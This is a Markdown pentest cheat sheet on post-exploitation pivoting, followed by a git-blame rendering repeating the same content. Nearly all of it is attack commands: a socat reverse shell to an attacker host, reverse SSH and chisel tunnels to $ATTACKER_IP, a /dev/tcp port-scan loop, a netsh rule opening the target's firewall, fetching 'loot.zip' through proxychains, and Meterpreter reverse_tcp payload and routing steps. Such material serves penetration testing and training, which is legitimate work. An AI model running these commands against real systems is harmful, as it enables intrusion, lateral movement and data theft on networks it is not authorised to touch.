killchain-compendium/Post Exploitation/Pivoting.md

# Pivoting

* Tunnelling/Proxying
* Port Forwarding

## Enumeration 

### Using material found on the machine and preinstalled tools

* `arp -a`
* `/etc/hosts` or `C:\Windows\System32\drivers\etc\hosts`
* `/etc/resolv.conf`
* `ipconfig /all`
* `nmcli dev show`
* [Statically compiled tools](https://github.com/andrew-d/static-binaries.git)

### Scripting Techniques
```sh
for i in {1..255}; do (ping -c 1 192.168.0.${1} | grep "bytes from" &); done
for i in {1..65535}; do (echo > /dev/tcp/192.168.0.1/$i) >/dev/null 2>&1 && echo $i is open; done
```
* Using local tools through a proxy like `nmap`

## Tools

* Enumerating a network using native and statically compiled tools

### Proxychains / FoxyProxy

* In need of dynamic port forwarding execute a reverse proxy on the jumpserver to reach the attacker's proxychains
    ```sh
    ssh <username>@$ATTACKER_IP -R 9050 -N
    ```
* Proxychains, e.g. scan target via nmap, or connect via nc through jump server
    ```sh
    proxychains nc <IP> <PORT>
    proychains nmap <IP>
    proxychains ssh user@$TARGET_IP
    proxychains evil-winrm -i $TARGET_IP -u $USER -p $PASS
    proxychains wget http://$TARGET_IP:8000/loot.zip
    ```
    * Use `/etc/proxychains.conf` or `./proxychains.conf`containing:
    ```sh
    [ProxyList]
    # add proxy here ...
    # meanwhile
    # defaults set to "tor"
    socks4  127.0.0.1 9050
    #socks5 127.0.0.1 1337
    # proxy_dns
    ``` 
* FoxyProxy, choose proxy type, proxy IP and port in settings 

### SSH port forwarding and tunnelling (primarily Unix)

* LocalPortForwarding
    ```sh
    ssh -L $LOCAL_PORT:<IP_seen_from_Jumpserver>:<Port_seen_from_Jumpserver> <user>@<Jumpserver> -fN
    ```
    * Another possibility to use the jumpserver directly on it's cli via `ssh <username>@<jumpserver> -L *:$LOCAL_PORT:127.0.0.1:80 -N`. One can connect now to the target via the jumpserver
    * Tip: open port on windows target via
    ```sh
    netsh advfirewall firewall add rule name="new port" dir=in action=allow protocol=TCP localport=%PORT%
    ```

* Dynamic Port Forwarding
    ```sh
    ssh -D $PORT <user>@<Jumpserver> -fN
    ```

* Reverse Proxy, if there is an SSH client on the jumpserver but no SSH server via
    ```sh
    ssh -R $LOCAL_PORT:$TARGET_IP:$TARGET_PORT USERNAME@$ATTACKER_IP(local) -i $KEYFILE -fN
    ```
    * Tip1: create a user on the attacker to receive the connection without compromising your own password
    * Tip2: use `-N` to not receive an interactive shell. The attacking user does not necessarily have one on the target

### plink.exe (Windows)

* [latest version](https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html)
```sh
cmd.exe /c echo y | .\plink.exe -R <LocalPort>:<TargetIP>:<TargetPort> <user>@<Jumpserver> -i <key> -N
```
* Key generation
    ```sh
    puttygen <keyfile> -o key.ppk
    ```
* Circumvention, described by [U.Y.](https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d) 
```sh
echo y | &.\plink.exe -ssh -l <MYUSERNAME> -pw <MYPASSWORD> -R <MYIP>:<MYPORT>:127.0.0.1:<TARGETPORT> <MYIP>
```

### Socat

* Reverse shell on target via
    ```sh
    ./socat tcp-l:8000 tcp:<attacker-IP>:443 &
    ```
    * Attacking bind shell
    ```sh
    sudo nc -lvnp 443
    ```

* Relay on jumpserver via
    ```sh
    ./socat tcp-l:33060,fork,reuseaddr tcp:<TargetIP>:3306 &
    ```

* Quiet Port Forwarding
    * On attacker
    ```sh
    socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &
    ```
    * On relay server
    ```sh
    ./socat tcp:<attacker-IP>:8001 tcp:<TargetIP>:<TargetPort>,fork &
    ```
    * Open `localhost:8000`

* Processes are backgrounded via `&`. Therefore, the process can be quit by using the corresponding bg number like `kill %1`.

* In need of a Download on target, expose a port on the attacker via relay
    ```sh
    socat tcp-l:80,fork tcp:$ATTACKER_IP:80
    ```

### Chisel

* **Does not require SSH on target**
* Reverse Proxy
    * Bind port on attacker
    ```sh
    ./chisel server --reverse --port <ListeningPort> &
    ```
    * Reverse port on target/proxy
    ```sh
    ./chisel client <attacker-IP>:<attacker-Port> R:socks &
    ```
    * `proxychains.conf` contains
    ```sh
    [ProxyList]
    socks5 127.0.0.1 <Listening-Port>
    ```

* Forward SOCKS Proxy
    * Proxy/compromised machine
    ```sh
    ./chisel server -p <Listen-Port> --socks5
    ```
    * On attacker
    ```sh
    ./chisel client <target-IP>:<target-Port> <proxy-Port>:socks
    ```
* Remote Port Forward
    * On attacker
    ```sh
    ./chisel server -p <Listen-Port> --reverse &
    ```
    * On forwarder
    ```sh
    ./chisel client <attacker-IP>:<attackerListen-Port> R:<Forwarder-Port>:<target-IP>:<target-Port> &
    ```
* Local Port Forwarding
    * On proxy
    ```sh
    ./chisel server -p <Listen-Port>
    ```
    * On attacker
    ```sh
    ./chisel client <Listen-IP>:<Listen-Port> <attacker-IP>:<target-IP>:<target-Port>
    ```

### sshuttle

* `pip install sshuttle`
* `sshuttle -r <user>@<target> <subnet/CIDR>`
* or automatically determined
```sh
sshuttle -r <user>@<target> -N
```
* Key based auth
```sh
sshuttle -r <user>@<target> --ssh-cmd "ssh -i <key>" <subnet/CIDR>
```
* Exclude servers via `-x`, for example the target/gateway server

### Meterpreter

* Meterpreter with payload `set payload linux/x64/meterpreter_reverse_tcp` after successful connection do
```sh
portfwd add -l 22 -p 22 -r 127.0.0.1
```

#### Meterpreter add Subnet Route

```sh
run get_local_subnets 
background 
route add 10.1.1.0 255.255.255.0 1
route add 172.10.0.1/32 -1
route print
```
* Or use `load auto_add_route` from [rapid7's documentation](https://www.rapid7.com/blog/post/2010/02/09/automatically-routing-through-new-subnets/)

#### Meterpreter Auto Routing

* Upload payload and catch it with `multi/handler`
```
background
use post/multi/manage/autoroute
set session 1
set subnet <10.0.0.0>
run
```

#### Meterpreter Proxy Routing

* Specify socks proxy via
```sh
use auxiliary/server/socks_proxy
```
* Set proxychain on attacker accordingly
```sh
run srvhost=127.0.0.1 srvport=9050 version=4a
curl --proxy socks4a:localhost:9050
proxychains -q nmap 10.10.47.11
```

### rpivot

* [klsecservices' repo](https://github.com/klsecservices/rpivot.git)
* [Their windows binary release](https://github.com/klsecservices/rpivot/releases/tag/v1.0)

## Links

* [Shadowmove at the adepts of 0xcc](https://adepts.of0x.cc/shadowmove-hijack-socket/)
restructured Post Exploitation 2022-11-11 01:15:07 +01:00			`# Pivoting`

			`* Tunnelling/Proxying`
			`* Port Forwarding`

			`## Enumeration`

			`### Using material found on the machine and preinstalled tools`

			* `arp -a`
			* `/etc/hosts` or `C:\Windows\System32\drivers\etc\hosts`
			* `/etc/resolv.conf`
			* `ipconfig /all`
			* `nmcli dev show`
			`* [Statically compiled tools](https://github.com/andrew-d/static-binaries.git)`

			`### Scripting Techniques`
			```sh
			`for i in {1..255}; do (ping -c 1 192.168.0.${1} \| grep "bytes from" &); done`
			`for i in {1..65535}; do (echo > /dev/tcp/192.168.0.1/$i) >/dev/null 2>&1 && echo $i is open; done`
			```
			* Using local tools through a proxy like `nmap`

			`## Tools`

			`* Enumerating a network using native and statically compiled tools`

			`### Proxychains / FoxyProxy`

			`* In need of dynamic port forwarding execute a reverse proxy on the jumpserver to reach the attacker's proxychains`
			```sh
			`ssh <username>@$ATTACKER_IP -R 9050 -N`
			```
			`* Proxychains, e.g. scan target via nmap, or connect via nc through jump server`
			```sh
			`proxychains nc <IP> <PORT>`
			`proychains nmap <IP>`
			`proxychains ssh user@$TARGET_IP`
			`proxychains evil-winrm -i $TARGET_IP -u $USER -p $PASS`
			`proxychains wget http://$TARGET_IP:8000/loot.zip`
			```
			* Use `/etc/proxychains.conf` or `./proxychains.conf`containing:
			```sh
			`[ProxyList]`
			`# add proxy here ...`
			`# meanwhile`
			`# defaults set to "tor"`
			`socks4 127.0.0.1 9050`
			`#socks5 127.0.0.1 1337`
			`# proxy_dns`
			```
			`* FoxyProxy, choose proxy type, proxy IP and port in settings`

			`### SSH port forwarding and tunnelling (primarily Unix)`

			`* LocalPortForwarding`
			```sh
			`ssh -L $LOCAL_PORT:<IP_seen_from_Jumpserver>:<Port_seen_from_Jumpserver> <user>@<Jumpserver> -fN`
			```
			* Another possibility to use the jumpserver directly on it's cli via `ssh <username>@<jumpserver> -L *:$LOCAL_PORT:127.0.0.1:80 -N`. One can connect now to the target via the jumpserver
			`* Tip: open port on windows target via`
			```sh
			`netsh advfirewall firewall add rule name="new port" dir=in action=allow protocol=TCP localport=%PORT%`
			```

			`* Dynamic Port Forwarding`
			```sh
			`ssh -D $PORT <user>@<Jumpserver> -fN`
			```

			`* Reverse Proxy, if there is an SSH client on the jumpserver but no SSH server via`
			```sh
			`ssh -R $LOCAL_PORT:$TARGET_IP:$TARGET_PORT USERNAME@$ATTACKER_IP(local) -i $KEYFILE -fN`
			```
			`* Tip1: create a user on the attacker to receive the connection without compromising your own password`
			* Tip2: use `-N` to not receive an interactive shell. The attacking user does not necessarily have one on the target

			`### plink.exe (Windows)`

			`* [latest version](https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html)`
			```sh
			`cmd.exe /c echo y \| .\plink.exe -R <LocalPort>:<TargetIP>:<TargetPort> <user>@<Jumpserver> -i <key> -N`
			```
			`* Key generation`
			```sh
			`puttygen <keyfile> -o key.ppk`
			```
			`* Circumvention, described by [U.Y.](https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d)`
			```sh
			`echo y \| &.\plink.exe -ssh -l <MYUSERNAME> -pw <MYPASSWORD> -R <MYIP>:<MYPORT>:127.0.0.1:<TARGETPORT> <MYIP>`
			```

			`### Socat`

			`* Reverse shell on target via`
			```sh
			`./socat tcp-l:8000 tcp:<attacker-IP>:443 &`
			```
			`* Attacking bind shell`
			```sh
			`sudo nc -lvnp 443`
			```

			`* Relay on jumpserver via`
			```sh
			`./socat tcp-l:33060,fork,reuseaddr tcp:<TargetIP>:3306 &`
			```

			`* Quiet Port Forwarding`
			`* On attacker`
			```sh
			`socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &`
			```
			`* On relay server`
			```sh
			`./socat tcp:<attacker-IP>:8001 tcp:<TargetIP>:<TargetPort>,fork &`
			```
			* Open `localhost:8000`

			* Processes are backgrounded via `&`. Therefore, the process can be quit by using the corresponding bg number like `kill %1`.

			`* In need of a Download on target, expose a port on the attacker via relay`
			```sh
			`socat tcp-l:80,fork tcp:$ATTACKER_IP:80`
			```

			`### Chisel`

			`* Does not require SSH on target`
			`* Reverse Proxy`
			`* Bind port on attacker`
			```sh
bump 2023-02-14 21:05:04 +01:00			`./chisel server --reverse --port <ListeningPort> &`
restructured Post Exploitation 2022-11-11 01:15:07 +01:00			```
			`* Reverse port on target/proxy`
			```sh
			`./chisel client <attacker-IP>:<attacker-Port> R:socks &`
			```
			* `proxychains.conf` contains
			```sh
			`[ProxyList]`
			`socks5 127.0.0.1 <Listening-Port>`
			```

			`* Forward SOCKS Proxy`
			`* Proxy/compromised machine`
			```sh
			`./chisel server -p <Listen-Port> --socks5`
			```
			`* On attacker`
			```sh
			`./chisel client <target-IP>:<target-Port> <proxy-Port>:socks`
			```
			`* Remote Port Forward`
			`* On attacker`
			```sh
			`./chisel server -p <Listen-Port> --reverse &`
			```
			`* On forwarder`
			```sh
			`./chisel client <attacker-IP>:<attackerListen-Port> R:<Forwarder-Port>:<target-IP>:<target-Port> &`
			```
			`* Local Port Forwarding`
			`* On proxy`
			```sh
			`./chisel server -p <Listen-Port>`
			```
			`* On attacker`
			```sh
			`./chisel client <Listen-IP>:<Listen-Port> <attacker-IP>:<target-IP>:<target-Port>`
			```

			`### sshuttle`

			* `pip install sshuttle`
			* `sshuttle -r <user>@<target> <subnet/CIDR>`
			`* or automatically determined`
			```sh
			`sshuttle -r <user>@<target> -N`
			```
			`* Key based auth`
			```sh
			`sshuttle -r <user>@<target> --ssh-cmd "ssh -i <key>" <subnet/CIDR>`
			```
			* Exclude servers via `-x`, for example the target/gateway server

			`### Meterpreter`

			* Meterpreter with payload `set payload linux/x64/meterpreter_reverse_tcp` after successful connection do
			```sh
			`portfwd add -l 22 -p 22 -r 127.0.0.1`
			```

			`#### Meterpreter add Subnet Route`

			```sh
			`run get_local_subnets`
			`background`
			`route add 10.1.1.0 255.255.255.0 1`
bump 2022-12-12 20:03:55 +01:00			`route add 172.10.0.1/32 -1`
restructured Post Exploitation 2022-11-11 01:15:07 +01:00			`route print`
			```
			* Or use `load auto_add_route` from [rapid7's documentation](https://www.rapid7.com/blog/post/2010/02/09/automatically-routing-through-new-subnets/)

			`#### Meterpreter Auto Routing`

			* Upload payload and catch it with `multi/handler`
			```
			`background`
			`use post/multi/manage/autoroute`
			`set session 1`
			`set subnet <10.0.0.0>`
			`run`
			```

			`#### Meterpreter Proxy Routing`

			`* Specify socks proxy via`
			```sh
			`use auxiliary/server/socks_proxy`
			```
			`* Set proxychain on attacker accordingly`
bump 2022-12-12 20:03:55 +01:00			```sh
			`run srvhost=127.0.0.1 srvport=9050 version=4a`
			`curl --proxy socks4a:localhost:9050`
			`proxychains -q nmap 10.10.47.11`
			```
restructured Post Exploitation 2022-11-11 01:15:07 +01:00
			`### rpivot`

			`* [klsecservices' repo](https://github.com/klsecservices/rpivot.git)`
			`* [Their windows binary release](https://github.com/klsecservices/rpivot/releases/tag/v1.0)`

			`## Links`

			`* [Shadowmove at the adepts of 0xcc](https://adepts.of0x.cc/shadowmove-hijack-socket/)`